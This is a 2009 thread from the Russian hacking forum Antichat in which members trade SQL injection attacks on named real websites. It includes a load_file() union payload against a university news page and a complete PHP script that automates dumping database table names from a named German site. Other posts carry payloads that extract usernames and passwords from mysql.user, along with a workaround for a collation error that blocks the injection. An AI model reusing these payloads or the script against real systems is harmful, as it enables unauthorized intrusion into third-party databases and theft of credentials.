ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #10621  
Старый 06.12.2009, 19:54
Аватар для 547
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию

Цитата:
Сообщение от mailbrush  
У тебя нету нестандартного мышления
с чего ты взял?
 
Ответить с цитированием

  #10622  
Старый 06.12.2009, 19:56
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

С того, что оно у тебя стандартное - "Нету нормальной админки, нету шелла")

PS:
Код:
http://wolfpack.loyno.edu/news.php?action=view&id=-12+union+select+1,2,3,4,load_file(0x2F746D702F6D61696C6272757368)
 
Ответить с цитированием

  #10623  
Старый 06.12.2009, 20:44
Аватар для MaydDay
MaydDay
Новичок
Регистрация: 21.10.2009
Сообщений: 10
Провел на форуме:
35014

Репутация: 0
По умолчанию

можно что-нибуть выжать или дохлый номер?
http://www.odz.com.ua/modules.php?name=music&d_op=last_music&pagenum='
 
Ответить с цитированием

  #10624  
Старый 06.12.2009, 20:48
Аватар для FlaktW
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014

Репутация: 8
По умолчанию

Настройте пожалуйста скрипт.

[/PHP]<?php
set_time_limit(0);
$set['b']='121212';//Что находится перед выводиомй инфой
$set['e']='212121';//Что находится после выводимой инфы
$set['u']='http://www.engelmt.de/en/cataloque/artikelgruppen.php?id=';//URL с узвимым параметров В КОНЦЕ(!)
$set['z']='-91 union select 1,2,3,4,5,6,7,concat(table_schema,0x3a,table_name) ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 ,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from+information_schema.tables LIMIT +++counter+++,1/*';//Уязвимый параметр
$set['c']='+++counter+++';//Строка счетчика
$set['f']='0';//Начальное значение счетчика
$set['s']='50';//Конечное значение счетчика
$set['h']='www.engelmt.de';//Хост

if(!empty($_GET['b']))$set['b']=$_GET['b'];
if(!empty($_GET['e']))$set['e']=$_GET['e'];
if(!empty($_GET['u']))$set['u']=$_GET['u'];
if(!empty($_GET['z']))$set['z']=$_GET['z'];
if(!empty($_GET['c']))$set['c']=$_GET['c'];
if(!empty($_GET['f']))$set['f']=$_GET['f'];
if(!empty($_GET['s']))$set['s']=$_GET['s'];
if(!empty($_GET['h']))$set['h']=$_GET['h'];

for($i=$set['f'];$i<=$set['s'];$i++)
{
$zapros=str_replace($set['c'],$i,$set['z']);//Изменияем счетчик в уязвимом параметре

//Создаем пакет
$header="GET ".$set['u'].urlencode($zapros)." HTTP/1.0\r\n";
$header.="Accept-Language: en-us,en;q=0.5\r\n";
$header.="Accept-Charset: utf-8,*;q=0.7\r\n";
$header.="Accept: text/html,image/jpeg,image/gif,text/xml,text/plain,image/png,*/*;q=0.5";
$header.="User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50\r\n";
$header.="Connection: keep-alive\r\n";
$header.="Cookie: PHPSESSID=028df047751bfc9a2ee18204eb2d5595\r\n";
$header.='Cookie2: $Version=1'."\r\n";
$header.="Host: ".$set['h']."\r\n\r\n";

$dt="";
$fp=fsockopen($set['h'], 80);
fwrite($fp, $header);
while(!feof($fp)) $dt.=fread($fp, 1024);
fclose($fp);

//Вырезаем необходимую инфу
$dt=substr($dt,strpos($dt,$set['b'])+strlen($set['b']));
$dt=substr($dt,0,strpos($dt,$set['e']));

//Выводим инфу на экран
echo($dt."\r\n");
flush();
}

?>
 
Ответить с цитированием

  #10625  
Старый 07.12.2009, 08:18
Аватар для x[0]x
x[0]x
Banned
Регистрация: 02.12.2008
Сообщений: 43
Провел на форуме:
131685

Репутация: 4
По умолчанию

атрибут космический-
бруто технику описывали уже с минимальным количеством запросов
 
Ответить с цитированием

  #10626  
Старый 07.12.2009, 14:47
Аватар для p.r0phe.t
p.r0phe.t
Познающий
Регистрация: 22.08.2009
Сообщений: 98
Провел на форуме:
224604

Репутация: 19
По умолчанию

Подскажите,как бороьтся с такой ошибкой?
Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (latin1_bin,IMPLICIT) for operation 'UNION'
Запрос
?id=-10256'+union+select+1,2,3,4,5,6,user,password,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7+from+mysql.user+limit+1,1/*
 
Ответить с цитированием

  #10627  
Старый 07.12.2009, 14:51
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от p.r0phe.t  
Подскажите,как бороьтся с такой ошибкой?
Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (latin1_bin,IMPLICIT) for operation 'UNION'
Прочтением статей мб?
https://forum.antichat.ru/thread104591.html
Вопрос №2
 
Ответить с цитированием

  #10628  
Старый 07.12.2009, 14:52
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
Сообщение от p.r0phe.t  
Подскажите,как бороьтся с такой ошибкой?
Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (latin1_bin,IMPLICIT) for operation 'UNION'
Запрос
?id=-10256'+union+select+1,2,3,4,5,6,user,password,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7+from+mysql.user+limit+1,1/*
?id=-10256'+union+select+1,2,3,4,5,6,AES_DECRYPT(AES_EN CRYPT(user,password)),9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27+from+mysql.user+limit+ 1,1/*
 
Ответить с цитированием

  #10629  
Старый 07.12.2009, 14:59
Аватар для p.r0phe.t
p.r0phe.t
Познающий
Регистрация: 22.08.2009
Сообщений: 98
Провел на форуме:
224604

Репутация: 19
По умолчанию

Спасибо! =)
 
Ответить с цитированием

  #10630  
Старый 07.12.2009, 15:18
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от Ctacok  
?id=-10256'+union+select+1,2,3,4,5,6,AES_DECRYPT(AES_EN CRYPT(user,password)),9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27+from+mysql.user+limit+ 1,1/*
И что, работает так?

Тебе тоже не мешает, кстати, статьи перечитать Ну или по синтаксису что-то
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ